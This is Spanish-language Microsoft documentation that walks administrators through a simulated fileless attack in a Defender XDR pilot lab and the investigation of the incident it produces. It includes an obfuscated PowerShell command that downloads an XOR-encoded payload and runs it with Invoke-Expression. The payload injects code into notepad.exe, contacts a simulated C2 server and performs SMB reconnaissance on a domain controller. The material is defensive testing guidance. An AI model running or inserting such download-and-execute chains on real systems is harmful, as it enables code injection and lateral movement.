Ejecución de una simulación de ataque en un entorno piloto de Microsoft Defender XDR

  • Artículo

Este artículo es el paso 1 del 2 en el proceso de realizar una investigación y respuesta de un incidente en Microsoft Defender XDR mediante un entorno piloto. Para obtener más información sobre este proceso, consulte el artículo de información general .

Después de preparar el entorno piloto, es el momento de probar la respuesta a incidentes de Microsoft Defender XDR y las funcionalidades automatizadas de investigación y corrección mediante la creación de un incidente con un ataque simulado y el uso del portal de Microsoft Defender para investigar y responder.

Un incidente en Microsoft Defender XDR es una colección de alertas correlacionadas y datos asociados que componen la historia de un ataque.

Los servicios y aplicaciones de Microsoft 365 crean alertas cuando detectan un evento o actividad sospechosos o malintencionados. Las alertas individuales proporcionan pistas valiosas sobre un ataque completado o en curso. Sin embargo, los ataques suelen emplear varias técnicas en distintos tipos de entidades, como dispositivos, usuarios y buzones de entrada. El resultado son varias alertas para varias entidades del espacio empresarial.

Nota:

Si no está familiarizado con el análisis de seguridad y la respuesta a incidentes, consulte el tutorial Responder a su primer incidente para obtener una visita guiada de un proceso típico de análisis, corrección y revisión posterior al incidente.

Simulación de ataques con el portal de Microsoft Defender

El portal de Microsoft Defender tiene funcionalidades integradas para crear ataques simulados en el entorno piloto:

Defender para Office 365 Entrenamiento de simulación de ataque

Defender para Office 365 con Microsoft 365 E5 o Microsoft Defender para Office 365 Plan 2 incluye entrenamiento de simulación de ataques para ataques de phishing. Los pasos básicos son:

  1. Create una simulación

    Para obtener instrucciones paso a paso sobre cómo crear e iniciar una nueva simulación, consulte Simular un ataque de suplantación de identidad (phishing).

  2. Create una carga

    Para obtener instrucciones paso a paso sobre cómo crear una carga útil para su uso dentro de una simulación, consulte Create una carga personalizada para el entrenamiento de simulación de ataques.

  3. Obtención de información

    Para obtener instrucciones paso a paso sobre cómo obtener información con los informes, consulte Obtención de información a través del entrenamiento de simulación de ataques.

Para obtener más información, vea Simulaciones.

Tutoriales de ataques de Defender for Endpoint & simulaciones

Estas son las simulaciones de Defender para punto de conexión de Microsoft:

  • El documento quita la puerta trasera
  • Investigación automatizada (puerta trasera)

Hay simulaciones adicionales de orígenes de terceros. También hay un conjunto de tutoriales.

Para cada simulación o tutorial:

  1. Descargue y lea el documento de tutorial correspondiente proporcionado.

  2. Descargue el archivo de simulación. Puede optar por descargar el archivo o script en el dispositivo de prueba, pero no es obligatorio.

  3. Ejecute el archivo o script de simulación en el dispositivo de prueba como se indica en el documento de tutorial.

Para obtener más información, vea Experiencia Microsoft Defender para punto de conexión a través de ataque simulado.

Simulación de un ataque con un controlador de dominio aislado y un dispositivo cliente (opcional)

En este ejercicio opcional de respuesta a incidentes, simulará un ataque en un controlador de dominio de Servicios de dominio de Active Directory aislado (AD DS) y un dispositivo Windows mediante un script de PowerShell y, a continuación, investigará, corregirá y resolverá el incidente.

En primer lugar, debe agregar puntos de conexión al entorno piloto.

Adición de puntos de conexión de entorno piloto

En primer lugar, debe agregar un controlador de dominio de AD DS aislado y un dispositivo Windows al entorno piloto.

  1. Compruebe que el inquilino del entorno piloto ha habilitado Microsoft Defender XDR.

  2. Compruebe que el controlador de dominio:

  3. Compruebe que el dispositivo de prueba:

Si usa grupos de inquilinos y dispositivos, cree un grupo de dispositivos dedicado para el dispositivo de prueba e insérelo en el nivel superior.

Una alternativa es hospedar el controlador de dominio de AD DS y probar el dispositivo como máquinas virtuales en los servicios de infraestructura de Microsoft Azure. Puede usar las instrucciones de la fase 1 de la Guía del laboratorio de pruebas empresarial simulado, pero omitir la creación de la máquina virtual APP1.

Este es el resultado.

El entorno de evaluación mediante la Guía de laboratorio de pruebas empresariales simuladas

Simulará un ataque sofisticado que aprovecha técnicas avanzadas para ocultarse de la detección. El ataque enumera las sesiones abiertas del Bloque de mensajes del servidor (SMB) en los controladores de dominio y recupera las direcciones IP recientes de los dispositivos de los usuarios. Esta categoría de ataques normalmente no incluye archivos eliminados en el dispositivo de la víctima y se producen únicamente en la memoria. "Viven de la tierra" mediante el uso de herramientas administrativas y del sistema existentes e insertan su código en procesos del sistema para ocultar su ejecución. Este comportamiento les permite eludir la detección y persistir en el dispositivo.

En esta simulación, nuestro escenario de ejemplo comienza con un script de PowerShell. En el mundo real, es posible que se engañó a un usuario para que ejecute un script o que el script se ejecute desde una conexión remota a otro equipo desde un dispositivo infectado anteriormente, lo que indica que el atacante está intentando moverse lateralmente en la red. La detección de estos scripts puede ser difícil porque los administradores también suelen ejecutar scripts de forma remota para llevar a cabo diversas actividades administrativas.

Ataque de PowerShell sin archivos con inyección de procesos y ataque de reconocimiento smb

Durante la simulación, el ataque inserta el código de shell en un proceso aparentemente inocente. El escenario requiere el uso de notepad.exe. Elegimos este proceso para la simulación, pero es más probable que los atacantes tengan como destino un proceso de sistema de ejecución prolongada, como svchost.exe. A continuación, el código de shell se pone en contacto con el servidor de comandos y control (C2) del atacante para recibir instrucciones sobre cómo continuar. El script intenta ejecutar consultas de reconocimiento en el controlador de dominio (DC). Reconocimiento permite a un atacante obtener información sobre la información de inicio de sesión de usuario reciente. Una vez que los atacantes tienen esta información, pueden moverse lateralmente en la red para llegar a una cuenta confidencial específica.

Importante

Para obtener resultados óptimos, siga las instrucciones de simulación de ataques de la forma más cercana posible.

Ejecución de la simulación de ataque del controlador de dominio de AD DS aislada

Para ejecutar la simulación del escenario de ataque:

  1. Asegúrese de que el entorno piloto incluye el controlador de dominio de AD DS aislado y el dispositivo Windows.

  2. Inicie sesión en el dispositivo de prueba con la cuenta de usuario de prueba.

  3. Abra una ventana Windows PowerShell en el dispositivo de prueba.

  4. Copie el siguiente script de simulación:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    Nota:

    Si abre este artículo en un explorador web, es posible que encuentre problemas al copiar el texto completo sin perder determinados caracteres ni introducir saltos de línea adicionales. Si este es el caso, descargue este documento y ábralo en Adobe Reader.

  5. Pegue y ejecute el script copiado en la ventana de PowerShell.

Nota:

Si ejecuta PowerShell mediante el protocolo de escritorio remoto (RDP), use el comando Escribir texto del Portapapeles en el cliente RDP porque es posible que la tecla de acceso rápido CTRL-V o el método de clic y pegado con el botón derecho no funcionen. Las versiones recientes de PowerShell a veces tampoco aceptarán ese método, es posible que primero tenga que copiar en el Bloc de notas en la memoria, copiarlo en la máquina virtual y, a continuación, pegarlo en PowerShell.

Unos segundos después, se abrirá la aplicación Bloc de notas. Se insertará un código de ataque simulado en el Bloc de notas. Mantenga abierta la instancia del Bloc de notas generada automáticamente para experimentar el escenario completo.

El código de ataque simulado intentará comunicarse con una dirección IP externa (simulando el servidor C2) y, a continuación, intentará el reconocimiento con el controlador de dominio a través de SMB.

Verá este mensaje en la consola de PowerShell cuando se complete este script:

ran NetSessionEnum against [DC Name] with return code result 0

Para ver la característica De incidentes y respuestas automatizadas en acción, mantenga abierto el proceso de notepad.exe. Verá Incidentes automatizados y Respuesta detener el proceso del Bloc de notas.

Investigación del incidente del ataque simulado

Nota:

Antes de guiarle por esta simulación, watch el siguiente vídeo para ver cómo la administración de incidentes le ayuda a agrupar las alertas relacionadas como parte del proceso de investigación, donde puede encontrarla en el portal y cómo puede ayudarle en las operaciones de seguridad:

Al cambiar al punto de vista del analista de SOC, ahora puede empezar a investigar el ataque en el portal de Microsoft Defender.

  1. Abra el portal de Microsoft Defender.

  2. En el panel de navegación, seleccione Incidentes & Incidentes de alertas>.

  3. El nuevo incidente del ataque simulado aparecerá en la cola de incidentes.

    Ejemplo de la cola de incidentes

Investigación del ataque como un único incidente

Microsoft Defender XDR correlaciona el análisis y agrega todas las alertas e investigaciones relacionadas de diferentes productos en una entidad de incidente. Al hacerlo, Microsoft Defender XDR muestra una historia de ataque más amplia, lo que permite al analista de SOC comprender y responder a amenazas complejas.

Las alertas generadas durante esta simulación están asociadas a la misma amenaza y, como resultado, se agregan automáticamente como un único incidente.

Para ver el incidente:

  1. Abra el portal de Microsoft Defender.

  2. En el panel de navegación, seleccione Incidentes & Incidentes de alertas>.

  3. Seleccione el elemento más reciente haciendo clic en el círculo situado a la izquierda del nombre del incidente. Un panel lateral muestra información adicional sobre el incidente, incluidas todas las alertas relacionadas. Cada incidente tiene un nombre único que lo describe en función de los atributos de las alertas que incluye.

    Las alertas que se muestran en el panel se pueden filtrar en función de los recursos de servicio: Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, Microsoft Defender para punto de conexión, Microsoft Defender XDR y Microsoft Defender para Office 365.

  4. Seleccione Abrir página de incidente para obtener más información sobre el incidente.

    En la página Incidente , puede ver todas las alertas e información relacionadas con el incidente. La información incluye las entidades y los recursos implicados en la alerta, el origen de detección de las alertas (por ejemplo, Microsoft Defender for Identity o Microsoft Defender para punto de conexión) y el motivo por el que se vincularon entre sí. Al revisar la lista de alertas de incidentes se muestra la progresión del ataque. Desde esta vista, puede ver e investigar las alertas individuales.

    También puede hacer clic en Administrar incidente en el menú de la derecha para etiquetar el incidente, asignarlo a sí mismo y agregar comentarios.

Revisión de las alertas generadas

Echemos un vistazo a algunas de las alertas generadas durante el ataque simulado.

Nota:

Solo se examinarán algunas de las alertas generadas durante el ataque simulado. En función de la versión de Windows y los productos Microsoft Defender XDR que se ejecutan en el dispositivo de prueba, es posible que vea más alertas que aparecen en un orden ligeramente diferente.

Ejemplo de una alerta generada

Alerta: Se ha observado una inyección de proceso sospechosa (origen: Microsoft Defender para punto de conexión)

Los atacantes avanzados usan métodos sofisticados y sigilosos para conservar la memoria y ocultarse de las herramientas de detección. Una técnica común es operar desde dentro de un proceso de sistema de confianza en lugar de un ejecutable malintencionado, lo que dificulta las herramientas de detección y las operaciones de seguridad para detectar el código malintencionado.

Para permitir que los analistas de SOC detecten estos ataques avanzados, los sensores de memoria profundos de Microsoft Defender para punto de conexión proporcionan a nuestro servicio en la nube visibilidad sin precedentes de una variedad de técnicas de inyección de código entre procesos. En la ilustración siguiente se muestra cómo Defender para punto de conexión detectó y alertó sobre el intento de insertar código en notepad.exe.

Ejemplo de la alerta para la inyección de un código potencialmente malintencionado

Alerta: comportamiento inesperado observado por una ejecución de proceso sin argumentos de línea de comandos (Origen: Microsoft Defender para punto de conexión)

Microsoft Defender para punto de conexión detecciones suelen tener como destino el atributo más común de una técnica de ataque. Este método garantiza la durabilidad y eleva el listón para que los atacantes cambien a tácticas más recientes.

Empleamos algoritmos de aprendizaje a gran escala para establecer el comportamiento normal de los procesos comunes dentro de una organización y en todo el mundo y watch cuando estos procesos muestran comportamientos anómalos. Estos comportamientos anómalos suelen indicar que se introdujo código extraño y se ejecuta en un proceso de confianza.

En este escenario, el proceso notepad.exe está mostrando un comportamiento anómalo, lo que implica la comunicación con una ubicación externa. Este resultado es independiente del método específico que se usa para introducir y ejecutar el código malintencionado.

Nota:

Dado que esta alerta se basa en modelos de aprendizaje automático que requieren procesamiento de back-end adicional, puede tardar algún tiempo antes de ver esta alerta en el portal.

Tenga en cuenta que los detalles de la alerta incluyen la dirección IP externa, un indicador que puede usar como pivote para expandir la investigación.

Seleccione la dirección IP en el árbol de proceso de alertas para ver la página de detalles de la dirección IP.

Ejemplo de comportamiento inesperado de un proceso que se ejecuta sin argumentos de línea de comandos

En la ilustración siguiente se muestra la página de detalles de la dirección IP seleccionada (haciendo clic en dirección IP en el árbol proceso de alerta).

Ejemplo de la página de detalles de la dirección IP

Alerta: Reconocimiento de direcciones IP y de usuario (SMB) (origen: Microsoft Defender for Identity)

La enumeración mediante el protocolo bloque de mensajes de servidor (SMB) permite a los atacantes obtener información de inicio de sesión de usuario reciente que les ayuda a moverse lateralmente a través de la red para acceder a una cuenta confidencial específica.

En esta detección, se desencadena una alerta cuando la enumeración de sesión SMB se ejecuta en un controlador de dominio.

Ejemplo de alerta de Microsoft Defender for Identity para el reconocimiento de direcciones IP y de usuario

Revise la escala de tiempo del dispositivo con Microsoft Defender para punto de conexión

Después de explorar las distintas alertas de este incidente, vuelva a la página del incidente que investigó anteriormente. Seleccione la pestaña Dispositivos de la página incidente para revisar los dispositivos implicados en este incidente, tal y como informan Microsoft Defender para punto de conexión y Microsoft Defender for Identity.

Seleccione el nombre del dispositivo donde se realizó el ataque para abrir la página de entidad de ese dispositivo específico. En esa página, puede ver alertas que se desencadenaron y eventos relacionados.

Seleccione la pestaña Escala de tiempo para abrir la escala de tiempo del dispositivo y ver todos los eventos y comportamientos observados en el dispositivo en orden cronológico, intercalados con las alertas desencadenadas.

Ejemplo de escala de tiempo del dispositivo con comportamientos

La expansión de algunos de los comportamientos más interesantes proporciona detalles útiles, como árboles de proceso.

Por ejemplo, desplácese hacia abajo hasta que encuentre el evento de alerta Inyección de proceso sospechosa observada. Seleccione el powershell.exe insertado en notepad.exe evento de proceso debajo de él para mostrar el árbol de proceso completo para este comportamiento en el gráfico Entidades de eventos en el panel lateral. Use la barra de búsqueda para filtrar si es necesario.

Ejemplo del árbol de procesos para el comportamiento de creación de archivos de PowerShell seleccionado

Revise la información del usuario con Microsoft Defender for Cloud Apps

En la página del incidente, seleccione la pestaña Usuarios para mostrar la lista de usuarios implicados en el ataque. La tabla contiene información adicional sobre cada usuario, incluida la puntuación de prioridad de investigación de cada usuario.

Seleccione el nombre de usuario para abrir la página de perfil del usuario donde se puede realizar una investigación adicional. Obtenga más información sobre la investigación de usuarios de riesgo.

Página de usuario de Defender for Cloud Apps

Investigación y corrección automatizadas

Nota:

Antes de guiarle por esta simulación, watch el siguiente vídeo para familiarizarse con lo que es la recuperación automática automatizada, dónde encontrarla en el portal y cómo puede ayudar en las operaciones de seguridad:

Vuelva al incidente en el portal de Microsoft Defender. La pestaña Investigaciones de la página Incidente muestra las investigaciones automatizadas desencadenadas por Microsoft Defender for Identity y Microsoft Defender para punto de conexión. En la captura de pantalla siguiente se muestra solo la investigación automatizada desencadenada por Defender para punto de conexión. De forma predeterminada, Defender para punto de conexión corrige automáticamente los artefactos que se encuentran en la cola, lo que requiere una corrección.

Un ejemplo de las investigaciones automatizadas relacionadas con el incidente

Seleccione la alerta que desencadenó una investigación para abrir la página Detalles de la investigación. Verá los detalles siguientes:

  • Alertas que desencadenaron la investigación automatizada.
  • Usuarios y dispositivos afectados. Si se encuentran indicadores en dispositivos adicionales, también se mostrarán estos dispositivos adicionales.
  • Lista de pruebas. Las entidades encontradas y analizadas, como archivos, procesos, servicios, controladores y direcciones de red. Estas entidades se analizan para detectar posibles relaciones con la alerta y se califican como benignas o malintencionadas.
  • Amenazas encontradas. Amenazas conocidas que se encuentran durante la investigación.

Nota:

En función del tiempo, la investigación automatizada podría seguir ejecutándose. Espere unos minutos a que se complete el proceso antes de recopilar y analizar las pruebas y revisar los resultados. Actualice la página Detalles de la investigación para obtener los resultados más recientes.

Ejemplo de la página Detalles de la investigación

Durante la investigación automatizada, Microsoft Defender para punto de conexión identificó el proceso de notepad.exe, que se inyectó como uno de los artefactos que requieren corrección. Defender for Endpoint detiene automáticamente la inserción de procesos sospechosos como parte de la corrección automatizada.

Puede ver notepad.exe desaparecer de la lista de procesos en ejecución en el dispositivo de prueba.

Resolución del incidente

Una vez completada la investigación y confirmada que se va a corregir, se resuelve el incidente.

En la página Incidente , seleccione Administrar incidente. Establezca el estado en Resolver incidente y seleccione Alerta verdadera para la clasificación y Pruebas de seguridad para la determinación.

Ejemplo de la página incidentes con el panel Administrar incidente abierto, donde puede hacer clic en el modificador para resolver el incidente.

Cuando se resuelve el incidente, resuelve todas las alertas asociadas en el portal de Microsoft Defender y los portales relacionados.

Esto incluye simulaciones de ataque para el análisis de incidentes, la investigación automatizada y la resolución de incidentes.

Paso siguiente

Funcionalidades de respuesta a incidentes Microsoft Defender XDR

Paso 2 de 2: Probar Microsoft Defender XDR capacidades de respuesta a incidentes

Create el entorno de evaluación de Microsoft Defender XDR

Sugerencia

¿Desea obtener más información? Engage con la comunidad de seguridad de Microsoft en nuestra comunidad tecnológica: Microsoft Defender XDR Tech Community.